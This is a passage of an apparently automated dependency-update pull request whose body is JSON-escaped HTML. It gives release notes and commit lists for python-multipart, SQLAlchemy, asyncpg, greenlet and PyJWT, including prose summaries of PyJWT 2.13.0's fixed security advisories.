href=\"https://redirect.github.com/Kludex/python-multipart/pull/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eRemove custom \u003ccode\u003eFormParser\u003c/code\u003e classes \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/257\"\u003e#257\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eUPLOAD_DELETE_TMP\u003c/code\u003e to \u003ccode\u003eFormParser\u003c/code\u003e config \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/254\"\u003e#254\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eEmit \u003ccode\u003efield_end\u003c/code\u003e for trailing bare field names on finalize \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/230\"\u003e#230\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eHandle multipart headers case-insensitively \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/252\"\u003e#252\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eApply Apache-2.0 properly \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/247\"\u003e#247\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.24 (2026-04-05)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eValidate \u003ccode\u003echunk_size\u003c/code\u003e in \u003ccode\u003eparse_form()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/244\"\u003e#244\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.23 (2026-04-05)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/238ead62a0bb6f6cdfe122708faa13812f59f9a6\"\u003e\u003ccode\u003e238ead6\u003c/code\u003e\u003c/a\u003e Version 0.0.32 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/302\"\u003e#302\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/86729796093b04f7cf414ea6c2c4499e2a5750af\"\u003e\u003ccode\u003e8672979\u003c/code\u003e\u003c/a\u003e Replace per-byte partial-boundary scan with rfind lookbehind (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/300\"\u003e#300\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/8190779d8234c8bf8cbed7891c11d4bfb79e84df\"\u003e\u003ccode\u003e8190779\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 7 updates (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/301\"\u003e#301\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/0d3c086d237f6fd20fefe8853e95979276a07c44\"\u003e\u003ccode\u003e0d3c086\u003c/code\u003e\u003c/a\u003e Use uv package ecosystem for Dependabot (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/299\"\u003e#299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/4cffc68a165f7a6f6b7756ce006fabf07a05b7a4\"\u003e\u003ccode\u003e4cffc68\u003c/code\u003e\u003c/a\u003e Version 0.0.31 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/298\"\u003e#298\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/c814948acf509cef7881fa75c969969b19239bbf\"\u003e\u003ccode\u003ec814948\u003c/code\u003e\u003c/a\u003e Reject negative \u003ccode\u003eContent-Length\u003c/code\u003e in \u003ccode\u003eparse_form\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/297\"\u003e#297\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/6b837d47bc68826ed5cbbcb50c6c6a6093444494\"\u003e\u003ccode\u003e6b837d4\u003c/code\u003e\u003c/a\u003e Bound header field name size before validating (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/296\"\u003e#296\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/e0c4f9df2e737d1663fbbdd6563f80613a2089f9\"\u003e\u003ccode\u003ee0c4f9d\u003c/code\u003e\u003c/a\u003e Bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/b8a01bb683e8e8675fdb5d831b206a478c8215aa\"\u003e\u003ccode\u003eb8a01bb\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 3 updates (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/6732164f30c58e28589a1e22213d2f6b8c6bad9f\"\u003e\u003ccode\u003e6732164\u003c/code\u003e\u003c/a\u003e Speed up multipart header parsing and callback dispatch (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.20...0.0.32\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sqlalchemy` from 2.0.49 to 2.0.50\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/releases\"\u003esqlalchemy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.0.50\u003c/h1\u003e\n\u003cp\u003eReleased: May 24, 2026\u003c/p\u003e\n\u003ch2\u003eorm\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.joinedload()\u003c/code\u003e with\n\u003ccode\u003ePropComparator.of_type()\u003c/code\u003e targeting a joined-table subclass combined\nwith \u003ccode\u003ePropComparator.and_()\u003c/code\u003e referencing a column on that subclass\nwould generate invalid SQL, where the subclass column was not adapted to\nthe subquery alias.  Pull request courtesy Joaquin Hui Gomez.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13203\"\u003e#13203\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where the presence of a \u003ccode\u003eSessionEvents.do_orm_execute()\u003c/code\u003e\nevent hook would cause internal execution options such as \u003ccode\u003eyield_per\u003c/code\u003e and\nloader-specific state from the first \u003ccode\u003eorm_pre_session_exec\u003c/code\u003e pass to leak\ninto the second pass, leading to errors when using relationship loaders\nsuch as \u003ccode\u003eselectinload()\u003c/code\u003e and \u003ccode\u003eimmediateload()\u003c/code\u003e.  The execution\noptions passed to the second compilation pass are now based on the original\noptions plus only the explicit updates made via\n\u003ccode\u003eORMExecuteState.update_execution_options()\u003c/code\u003e within the event hook.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13301\"\u003e#13301\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.with_polymorphic()\u003c/code\u003e on a leaf class (a\nsubclass with no further descendants) or a non-inherited class would fail\nwith an \u003ccode\u003eAttributeError\u003c/code\u003e when used in an ORM statement, due to\n\u003ccode\u003e_orm.configure_mappers()\u003c/code\u003e not being triggered implicitly. The fix\nensures that \u003ccode\u003eAliasedInsp\u003c/code\u003e participates in the \u003ccode\u003e_post_inspect\u003c/code\u003e\nhook, triggering mapper configuration during ORM statement compilation.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13319\"\u003e#13319\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esql\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[sql] [bug]\u003c/strong\u003e Fixed issue where floor division (\u003ccode\u003e//\u003c/code\u003e) between a \u003ccode\u003eFloat\u003c/code\u003e or\n\u003ccode\u003eNumeric\u003c/code\u003e numerator and an \u003ccode\u003eInteger\u003c/code\u003e denominator would omit\nthe \u003ccode\u003eFLOOR()\u003c/code\u003e SQL wrapper on dialects where\n\u003ccode\u003eDialect.div_is_floordiv\u003c/code\u003e is \u003ccode\u003eTrue\u003c/code\u003e (the default, including\nPostgreSQL and SQLite).  \u003ccode\u003eFLOOR()\u003c/code\u003e is now applied if either the\ndenominator or the numerator is a non-integer, so that expressions such as\n\u003ccode\u003efloat_col // int_col\u003c/code\u003e render as \u003ccode\u003eFLOOR(float_col / int_col)\u003c/code\u003e instead\nof the incorrect \u003ccode\u003efloat_col / int_col\u003c/code\u003e.  Pull request courtesy r266-tech.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/10528\"\u003e#10528\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003epostgresql\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `asyncpg` from 0.30.0 to 0.31.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/MagicStack/asyncpg/releases\"\u003easyncpg's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.31.0\u003c/h2\u003e\n\u003cp\u003eEnable Python 3.14 with experimental subinterpreter/freethreading\nsupport.\u003c/p\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd Python 3.14 support, experimental subinterpreter/freethreading support (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1279\"\u003e#1279\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/elprans\"\u003e\u003ccode\u003e@​elprans\u003c/code\u003e\u003c/a\u003e in 9e42642b)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAvoid performing type introspection on known types (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1243\"\u003e#1243\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/elprans\"\u003e\u003ccode\u003e@​elprans\u003c/code\u003e\u003c/a\u003e in 5c9986c4)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMake \u003ccode\u003eprepare()\u003c/code\u003e not use named statements by default when cache is disabled (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1245\"\u003e#1245\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/elprans\"\u003e\u003ccode\u003e@​elprans\u003c/code\u003e\u003c/a\u003e in 5b14653e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eImplement connection service file functionality (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1223\"\u003e#1223\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/AndrewJackson2020\"\u003e\u003ccode\u003e@​AndrewJackson2020\u003c/code\u003e\u003c/a\u003e in 1d63bb15)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eFixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFix multi port connection string issue (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1222\"\u003e#1222\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/AndrewJackson2020\"\u003e\u003ccode\u003e@​AndrewJackson2020\u003c/code\u003e\u003c/a\u003e in 01c0db7b)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAvoid leaking connections if _can_use_connection fails (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1269\"\u003e#1269\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/yuliy-openai\"\u003e\u003ccode\u003e@​yuliy-openai\u003c/code\u003e\u003c/a\u003e in e94302d2)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eOther\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for EOL Python 3.8 (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1281\"\u003e#1281\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/elprans\"\u003e\u003ccode\u003e@​elprans\u003c/code\u003e\u003c/a\u003e in 6c2c4904)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/71775a67277fc0aa5bd2b9f15e848826d7078c4d\"\u003e\u003ccode\u003e71775a6\u003c/code\u003e\u003c/a\u003e asyncpg v0.31.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/508cae6441968ef7613a623fece7083cce66c2b3\"\u003e\u003ccode\u003e508cae6\u003c/code\u003e\u003c/a\u003e Test on PostgreSQL 18 (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1290\"\u003e#1290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/e534e5f15c73525a6509143b3828335517360f1b\"\u003e\u003ccode\u003ee534e5f\u003c/code\u003e\u003c/a\u003e Bump cibuildwheel\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/07fe5122a680f5768e39fc28d68c94b185037a52\"\u003e\u003ccode\u003e07fe512\u003c/code\u003e\u003c/a\u003e Bump pgproto\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/648b35f18199ebf2a30009376a6e9060cf7ad789\"\u003e\u003ccode\u003e648b35f\u003c/code\u003e\u003c/a\u003e Bump Cython to 3.2.1 (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1288\"\u003e#1288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/9e42642b9110d206706697921b6e697a0972649d\"\u003e\u003ccode\u003e9e42642\u003c/code\u003e\u003c/a\u003e Add Python 3.14 support, experimental subinterpreter/freethreading support (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/6fe1c494ef5c3069fa9149c48bf9f8f2cd69f95e\"\u003e\u003ccode\u003e6fe1c49\u003c/code\u003e\u003c/a\u003e Move development deps away from extras and into dependency groups (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1280\"\u003e#1280\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/7a548166c2b23561915c481bd332013e3a415cfb\"\u003e\u003ccode\u003e7a54816\u003c/code\u003e\u003c/a\u003e Fix a couple of missed Python version guards\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/6c2c4904e61b2cd2f502540730a24e246cff2ebd\"\u003e\u003ccode\u003e6c2c490\u003c/code\u003e\u003c/a\u003e Drop support for EOL Python 3.8 (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1281\"\u003e#1281\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/4c60ae890d1f3800f889679657357f91a6923568\"\u003e\u003ccode\u003e4c60ae8\u003c/code\u003e\u003c/a\u003e Bump version to 0.31.0.dev0\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/MagicStack/asyncpg/compare/v0.30.0...v0.31.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `greenlet` from 3.5.0 to 3.5.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-greenlet/greenlet/blob/master/CHANGES.rst\"\u003egreenlet's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e3.5.1 (2026-05-20)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdd preliminary support for Python 3.15b1. This has not been\nreviewed by CPython core developers, but all tests pass. Binary\nwheels of this version won't work on earlier Python 3.15 builds and\nmay not work on later 3.15 builds.\u003c/li\u003e\n\u003cli\u003eFix the discrepancy in the way the two \u003ccode\u003egetcurrent\u003c/code\u003e APIs behave\nduring greenlet teardown. One API (the C API used by, e.g.,  gevent) raised a\n\u003ccode\u003eRuntimeError\u003c/code\u003e; the other (the Python \u003ccode\u003egreenlet.getcurrent\u003c/code\u003e API)\nreturned \u003ccode\u003eNone\u003c/code\u003e. This second way is incompatible with greenlet's type\nannotations, so \u003ccode\u003egreenlet.getcurrent\u003c/code\u003e now raises a\n\u003ccode\u003eRuntimeError\u003c/code\u003e as well.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/b5e5fc43a51c27ecffa1b1c7107c91464a6b26e2\"\u003e\u003ccode\u003eb5e5fc4\u003c/code\u003e\u003c/a\u003e Preparing release 3.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/c8e177413d34bc36ed56d2c185c232ab0538be90\"\u003e\u003ccode\u003ec8e1774\u003c/code\u003e\u003c/a\u003e Tweak wording in CHANGES about greenlet.getcurrent.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/7fb10c570f37b3eb4c8909c6164fdfac3269ddb6\"\u003e\u003ccode\u003e7fb10c5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/510\"\u003e#510\u003c/a\u003e from python-greenlet/315\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/9718ce5a23ea3360232b78a806a837d6c3d6183d\"\u003e\u003ccode\u003e9718ce5\u003c/code\u003e\u003c/a\u003e Add Py 3.15; make both API versions of getcurrent() consistent in raising Run...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/276e08afc4ddba87e4366390e3eeaecd61ccb3b8\"\u003e\u003ccode\u003e276e08a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/509\"\u003e#509\u003c/a\u003e from python-greenlet/dependabot/github_actions/github...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/32b0ad69828eb69d879c70dbee948e685268901b\"\u003e\u003ccode\u003e32b0ad6\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish in the github-actions group\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/173b692dc84288ef41572612ac744754f98eaa90\"\u003e\u003ccode\u003e173b692\u003c/code\u003e\u003c/a\u003e Back to development: 3.5.1\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/python-greenlet/greenlet/compare/3.5.0...3.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A 